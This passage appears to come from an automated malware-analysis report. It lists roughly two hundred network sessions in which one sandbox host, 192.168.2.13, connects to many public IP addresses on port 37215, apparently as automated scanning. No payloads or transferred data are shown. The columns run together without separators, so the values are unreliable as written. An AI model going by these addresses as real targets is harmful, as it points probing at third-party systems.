                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15850192.168.2.1338160197.131.76.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15851192.168.2.1345910197.190.58.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15852192.168.2.1354442197.159.141.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15853192.168.2.1351812183.144.240.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15854192.168.2.1333800157.243.187.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15855192.168.2.135232438.201.48.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15856192.168.2.1358248157.143.105.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15857192.168.2.1336050197.55.76.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15858192.168.2.1356016157.104.76.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15859192.168.2.1345942201.56.99.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15860192.168.2.1354962181.163.44.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15861192.168.2.135267041.95.245.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15862192.168.2.1343442157.233.19.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15863192.168.2.1337398157.185.179.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15864192.168.2.1345922197.247.241.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15865192.168.2.1348334157.191.95.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15866192.168.2.1345760157.138.216.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15867192.168.2.135803041.240.162.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15868192.168.2.1333504159.188.252.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15869192.168.2.1347268131.193.175.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15870192.168.2.133883841.210.156.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15871192.168.2.1360016132.243.77.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15872192.168.2.135498441.220.74.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15873192.168.2.1359148113.181.210.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15874192.168.2.134452441.189.75.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15875192.168.2.1339744197.118.179.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15876192.168.2.1338712197.220.221.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15877192.168.2.1359440157.229.250.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15878192.168.2.1348696157.244.82.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15879192.168.2.134959241.212.236.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15880192.168.2.1357492197.168.146.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15881192.168.2.1333028177.164.153.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15882192.168.2.1348822157.69.98.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15883192.168.2.134402641.8.47.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15884192.168.2.134435041.52.219.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15885192.168.2.133288041.195.15.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15886192.168.2.135805641.199.132.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15887192.168.2.133573054.202.146.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15888192.168.2.1349462197.113.108.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15889192.168.2.1352484149.189.216.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15890192.168.2.1335934157.41.134.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15891192.168.2.134118041.48.20.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15892192.168.2.136086841.142.233.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15893192.168.2.1332780222.223.240.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15894192.168.2.134107641.224.8.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15895192.168.2.1336904157.200.120.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15896192.168.2.1352514195.235.132.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15897192.168.2.1360546157.122.30.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15898192.168.2.135850289.226.74.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15899192.168.2.1342672157.196.77.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15900192.168.2.133526041.184.193.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15901192.168.2.1358208130.100.198.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15902192.168.2.136056041.133.152.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15903192.168.2.1334052161.5.32.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15904192.168.2.1348970197.192.72.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15905192.168.2.1348472197.182.11.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15906192.168.2.1349430183.177.149.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15907192.168.2.133951620.121.72.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15908192.168.2.135170041.37.173.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15909192.168.2.1351368157.244.164.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15910192.168.2.134936850.50.53.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15911192.168.2.1356068157.70.223.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15912192.168.2.133614041.43.89.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15913192.168.2.134895841.128.224.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15914192.168.2.133774288.166.207.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15915192.168.2.1350370198.60.185.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15916192.168.2.1341868197.90.82.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15917192.168.2.1333462112.175.3.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15918192.168.2.1352518197.135.84.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15919192.168.2.1353924157.186.193.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15920192.168.2.1345426132.116.90.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15921192.168.2.134813441.172.221.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15922192.168.2.1333738197.46.235.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15923192.168.2.1348018157.235.18.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15924192.168.2.1354088144.226.90.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15925192.168.2.133882283.209.118.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15926192.168.2.134460041.129.189.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15927192.168.2.1333474157.148.37.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15928192.168.2.1356238150.53.44.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15929192.168.2.135662843.214.95.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15930192.168.2.1356872172.59.18.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15931192.168.2.134412057.105.140.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15932192.168.2.134282041.94.22.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15933192.168.2.1359406197.225.252.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15934192.168.2.1336938197.177.59.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15935192.168.2.133626641.83.150.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15936192.168.2.133592819.29.69.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15937192.168.2.1350226197.222.193.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15938192.168.2.1347852157.213.18.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15939192.168.2.133585641.15.169.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15940192.168.2.1347032157.183.198.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15941192.168.2.1345648157.206.57.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15942192.168.2.135567041.67.157.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15943192.168.2.135679841.2.171.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15944192.168.2.134476241.23.5.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15945192.168.2.1359670157.161.164.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15946192.168.2.1358158197.0.132.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15947192.168.2.1343018197.58.105.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15948192.168.2.134093641.239.156.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15949192.168.2.1340270157.90.25.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15950192.168.2.1342806197.161.62.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15951192.168.2.1350128157.60.28.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15952192.168.2.1339874157.95.63.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15953192.168.2.1354708197.6.195.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15954192.168.2.1338560157.67.213.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15955192.168.2.1343700157.23.223.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15956192.168.2.133808241.23.108.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15957192.168.2.135921641.226.30.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15958192.168.2.1348016222.70.11.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15959192.168.2.1349186157.252.229.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15960192.168.2.1340280181.166.139.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15961192.168.2.1348152197.215.137.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15962192.168.2.1340980157.158.3.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15963192.168.2.133835041.55.254.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15964192.168.2.1349586157.163.221.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15965192.168.2.1338458197.17.82.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15966192.168.2.1357808102.192.61.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15967192.168.2.133685241.252.27.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15968192.168.2.1357542157.150.41.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15969192.168.2.135062441.242.52.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15970192.168.2.1339932197.121.247.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15971192.168.2.1334882157.159.107.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15972192.168.2.135531641.96.75.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15973192.168.2.1351788157.228.237.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15974192.168.2.1360850198.187.52.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15975192.168.2.1350506157.130.144.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15976192.168.2.134938641.250.13.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15977192.168.2.1348556157.243.91.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15978192.168.2.135557489.220.126.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15979192.168.2.1334448188.224.38.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15980192.168.2.134040841.90.244.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15981192.168.2.1344182157.95.0.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15982192.168.2.133427862.77.137.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15983192.168.2.1337418157.65.23.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15984192.168.2.1349460157.156.116.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15985192.168.2.1341700157.190.225.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15986192.168.2.1350480140.83.52.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15987192.168.2.135016423.36.217.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15988192.168.2.1334296157.17.206.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15989192.168.2.134285641.224.69.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15990192.168.2.1337532197.202.99.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15991192.168.2.1340096158.61.28.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15992192.168.2.134746441.225.60.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15993192.168.2.135165641.45.47.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15994192.168.2.1345204157.13.39.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15995192.168.2.135333841.73.147.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15996192.168.2.1343460136.137.144.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15997192.168.2.133770037.49.121.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15998192.168.2.133565086.146.89.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15999192.168.2.134638041.219.71.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16000192.168.2.1350218157.174.128.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16001192.168.2.1341414157.98.34.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16002192.168.2.1352106157.13.213.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16003192.168.2.135169841.161.218.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16004192.168.2.1348254197.245.208.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16005192.168.2.135691441.84.152.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16006192.168.2.1360252179.175.173.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16007192.168.2.1337932197.13.217.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16008192.168.2.1357402197.109.60.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16009192.168.2.1357962157.22.209.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16010192.168.2.133892676.200.244.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16011192.168.2.1354592157.85.178.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16012192.168.2.1333694197.218.211.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16013192.168.2.133462623.222.43.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16014192.168.2.1340928197.173.239.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16015192.168.2.1346148157.118.247.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16016192.168.2.1359346157.204.190.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16017192.168.2.134829241.141.67.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16018192.168.2.1353064100.243.7.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16019192.168.2.135360445.58.137.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16020192.168.2.1357054157.67.133.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16021192.168.2.1349550197.180.100.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16022192.168.2.133385864.200.178.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16023192.168.2.1350446157.143.70.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16024192.168.2.134869841.201.219.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16025192.168.2.1355014197.25.35.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16026192.168.2.1346368197.56.227.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16027192.168.2.136097679.36.183.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16028192.168.2.1337192197.156.56.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16029192.168.2.1344686123.190.68.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16030192.168.2.1333904157.61.166.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16031192.168.2.1351260157.77.217.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16032192.168.2.1349658157.177.224.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16033192.168.2.1337636157.51.68.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16034192.168.2.1347788197.62.163.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16035192.168.2.1334124177.234.139.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16036192.168.2.1348196183.4.188.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16037192.168.2.135852897.245.46.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16038192.168.2.1336196157.137.50.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16039192.168.2.1346068197.36.161.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16040192.168.2.13545048.254.96.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16041192.168.2.1360882157.23.207.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16042192.168.2.1342590157.186.2.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16043192.168.2.135391841.93.64.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16044192.168.2.135301241.134.11.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16045192.168.2.1337386157.185.124.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16046192.168.2.1360778174.102.137.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16047192.168.2.134318640.212.89.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16048192.168.2.1333112197.155.135.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16049192.168.2.1346560117.100.176.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16050192.168.2.1346402197.20.145.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16051192.168.2.135165480.50.115.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16052192.168.2.1357776197.115.122.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16053192.168.2.1360848197.25.122.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16054192.168.2.1347438197.248.40.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16055192.168.2.1348060157.167.203.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16056192.168.2.135599441.225.154.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16057192.168.2.1359694197.130.179.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16058192.168.2.1354102171.235.71.7637215
                                                  TimestampBytes transferredDirectionData


